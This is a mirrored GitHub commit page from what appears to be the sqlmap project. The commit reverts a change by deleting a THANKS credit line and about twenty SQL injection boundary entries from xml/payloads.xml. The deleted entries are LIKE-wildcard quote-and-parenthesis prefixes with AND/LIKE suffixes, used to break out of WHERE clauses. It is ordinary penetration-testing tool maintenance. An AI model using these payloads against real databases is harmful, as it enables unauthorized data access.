Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 602369c

Browse files
committed
reverting last changes on boundaries
1 parent 588d829 commit 602369c

2 files changed

Lines changed: 0 additions & 145 deletions

File tree

doc/THANKS

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -326,7 +326,6 @@ David McNab <[email protected]>
326326
Spencer J. McIntyre <[email protected]>
327327
for reporting a minor bug
328328
for contributing a patch for OS fingerprinting on DB2
329-
for contributing a patch with LIKE wildcard payload boundaries
330329

331330
Brad Merrell <[email protected]>
332331
for reporting a minor bug

xml/payloads.xml

Lines changed: 0 additions & 144 deletions
Original file line numberDiff line numberDiff line change
@@ -446,150 +446,6 @@ Formats:
446446
<prefix>"</prefix>
447447
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
448448
</boundary>
449-
450-
<boundary>
451-
<level>2</level>
452-
<clause>1</clause>
453-
<where>1,2</where>
454-
<ptype>2</ptype>
455-
<prefix>%')</prefix>
456-
<suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix>
457-
</boundary>
458-
459-
<boundary>
460-
<level>3</level>
461-
<clause>1</clause>
462-
<where>1,2</where>
463-
<ptype>2</ptype>
464-
<prefix>%'))</prefix>
465-
<suffix>AND (('[RANDSTR]'='[RANDSTR]</suffix>
466-
</boundary>
467-
468-
<boundary>
469-
<level>4</level>
470-
<clause>1</clause>
471-
<where>1,2</where>
472-
<ptype>2</ptype>
473-
<prefix>%')))</prefix>
474-
<suffix>AND ((('[RANDSTR]'='[RANDSTR]</suffix>
475-
</boundary>
476-
477-
<boundary>
478-
<level>1</level>
479-
<clause>1</clause>
480-
<where>1,2</where>
481-
<ptype>2</ptype>
482-
<prefix>%'</prefix>
483-
<suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
484-
</boundary>
485-
486-
<boundary>
487-
<level>3</level>
488-
<clause>1</clause>
489-
<where>1,2</where>
490-
<ptype>3</ptype>
491-
<prefix>%')</prefix>
492-
<suffix>AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
493-
</boundary>
494-
495-
<boundary>
496-
<level>4</level>
497-
<clause>1</clause>
498-
<where>1,2</where>
499-
<ptype>3</ptype>
500-
<prefix>%'))</prefix>
501-
<suffix>AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
502-
</boundary>
503-
504-
<boundary>
505-
<level>5</level>
506-
<clause>1</clause>
507-
<where>1,2</where>
508-
<ptype>3</ptype>
509-
<prefix>%')))</prefix>
510-
<suffix>AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
511-
</boundary>
512-
513-
<boundary>
514-
<level>2</level>
515-
<clause>1</clause>
516-
<where>1,2</where>
517-
<ptype>3</ptype>
518-
<prefix>%'</prefix>
519-
<suffix>AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
520-
</boundary>
521-
522-
<boundary>
523-
<level>4</level>
524-
<clause>1</clause>
525-
<where>1,2</where>
526-
<ptype>4</ptype>
527-
<prefix>%")</prefix>
528-
<suffix>AND ("[RANDSTR]"="[RANDSTR]</suffix>
529-
</boundary>
530-
531-
<boundary>
532-
<level>4</level>
533-
<clause>1</clause>
534-
<where>1,2</where>
535-
<ptype>4</ptype>
536-
<prefix>%"))</prefix>
537-
<suffix>AND (("[RANDSTR]"="[RANDSTR]</suffix>
538-
</boundary>
539-
540-
<boundary>
541-
<level>5</level>
542-
<clause>1</clause>
543-
<where>1,2</where>
544-
<ptype>4</ptype>
545-
<prefix>%")))</prefix>
546-
<suffix>AND ((("[RANDSTR]"="[RANDSTR]</suffix>
547-
</boundary>
548-
549-
<boundary>
550-
<level>3</level>
551-
<clause>1</clause>
552-
<where>1,2</where>
553-
<ptype>4</ptype>
554-
<prefix>%"</prefix>
555-
<suffix>AND "[RANDSTR]"="[RANDSTR]</suffix>
556-
</boundary>
557-
558-
<boundary>
559-
<level>4</level>
560-
<clause>1</clause>
561-
<where>1,2</where>
562-
<ptype>5</ptype>
563-
<prefix>%")</prefix>
564-
<suffix>AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
565-
</boundary>
566-
567-
<boundary>
568-
<level>5</level>
569-
<clause>1</clause>
570-
<where>1,2</where>
571-
<ptype>5</ptype>
572-
<prefix>%"))</prefix>
573-
<suffix>AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
574-
</boundary>
575-
576-
<boundary>
577-
<level>5</level>
578-
<clause>1</clause>
579-
<where>1,2</where>
580-
<ptype>5</ptype>
581-
<prefix>%")))</prefix>
582-
<suffix>AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
583-
</boundary>
584-
585-
<boundary>
586-
<level>4</level>
587-
<clause>1</clause>
588-
<where>1,2</where>
589-
<ptype>5</ptype>
590-
<prefix>%"</prefix>
591-
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
592-
</boundary>
593449
<!-- End of WHERE/HAVING clause boundaries -->
594450

595451

0 commit comments

Comments
 (0)